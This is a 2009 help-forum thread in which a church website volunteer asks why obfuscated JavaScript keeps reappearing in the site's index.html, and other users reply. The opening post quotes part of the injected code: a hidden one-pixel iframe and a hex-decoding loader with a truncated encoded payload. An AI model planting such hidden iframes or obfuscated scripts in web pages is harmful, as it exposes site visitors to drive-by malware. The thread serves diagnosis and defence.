Malscript problem pls help!

salai January 24, 2009 at 00:18:44
Specs: Windows XP, intel
I help maintaining our local church website and we have some issue with malscript on our index.html page. After updating and uploading the index.html file to the server, some weir code keep adding right after the body tag. The file is good for two three days and the malscript code started to appear. I delete the file and re-upload a clean index.html file and again after one or two days the code comes back and when I open the web site my anti-virus said as follows,

"McAfee has automatically blocked and removed a Trojan.

About this Trojan
Detected: JS/Obfuscated (Trojan)
Location: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\14383Y2A\bciweb_info[1].htm

Trojans appear as legitimate programs but can damage valuable files, disrupt performance, and allow unauthorized access to your computer."

The web design appearance is messed up too.

I have this issue for about amonth or so now. I formatted my hard drive, cleaned everything, installed anti-virus. I changed the password and try the whole thing but happen the same thing. I contact the server customer service, but all they say is that there is problem with the coding and that the code could come from the uploading process.
Any help, ideas, suggestions will be much appreciated.


here is part of the code that keep adding

iframe src='http://url/' width='1' height='1' style='visibility: hidden;'></iframe><script>function c102916999516l497845a6109d5(l497845a610dbe){ return (parseInt(l497845a610dbe,16));}function l497845a611977(l497845a611d5f){ function l497845a612d03(){var l497845a6130ea=2;return l497845a6130ea;} var l497845a612148='';l497845a6134d6=String.fromCharCode;for(l497845a6126c6=0;l497845a6126c6<l497845a611d5f.length;l497845a6126c6+=l497845a612d03()){ l497845a612148+=(l497845a6134d6(c102916999516l497845a6109d5(l497845a611d5f.substr(l497845a6126c6,l497845a612d03()))));}return l497845a612148;} var x5a='';var l497845a6138bd='3C736'+x5a+'3726'+x5a+'970743E6'+x5a+'96'+x5a+'6'+x5a+'28216'+x5a+'D796'+

See More: Malscript problem pls help!

Report •

March 3, 2009 at 21:03:35
Well, it's for sure something happening on server side.
I'm a server host, and am unfortunately familiar with the problem.

attacks appear with rather similar code every time, but it's usually different, the JS is actually processed some how and it's being randomize/encrypted by which ever thing is installed on the host it self.

LET ME SAY, that this has NOTHING to do with your computer, it's something that happens on the server without you necessarily having knowledge of it.

The reason maccafe picks it up as a virus is that the code looks like HEX/BINARY and does not belong where it's found.

the moment you download the page, the anty-virus will strip out that line of code, and let you see the rest of the page.

You will loose your </body> tag as it seems to be attaching to that exact line of code.

also, You did not include all of the code.
having all of the code could allow people to understand what is happening.

The principal of this attack is a simple IFRAME attack, which will direct users to another page without their knowledge.
this could potentially be used to actually server viruse off of your pages, and it's a rather IMPORTANT situation that your host should take care of.

can you send me some info on who you are, your host is, and what the website is ?

I know you are not one of my clients :P

let me know.


Report •

March 9, 2009 at 04:23:27
I noticed you referred to a file name that had a [1] added to it. This usually refers to an amended file or a substitute for the original file. I am having problems with a virus that uses this format also. The file name came up when i was trying to open an Internet Explorer page. The Address i entered was: "". That address was substituted with one named "runonce3[1].aspx. It was supposed to be located in Documents and Settings/Current User/Local Settings/Application Data but it deleted it self. I was able to capture a copy of it because it was the "SOURCE" FILE for the Error Page that came up in Internet Explorer..."Unable to...etc" (Access "VIEW" then select "SOURCE" . Perhaps Server Side Error or change in code is just a symptom. The SOURCE file (runonce3[1].aspx) referred to getting a document from the following site: "" . Hope this is of some help. "itskathysnet" 3/9/09 5:22 AM

Report •

Related Solutions

Ask Question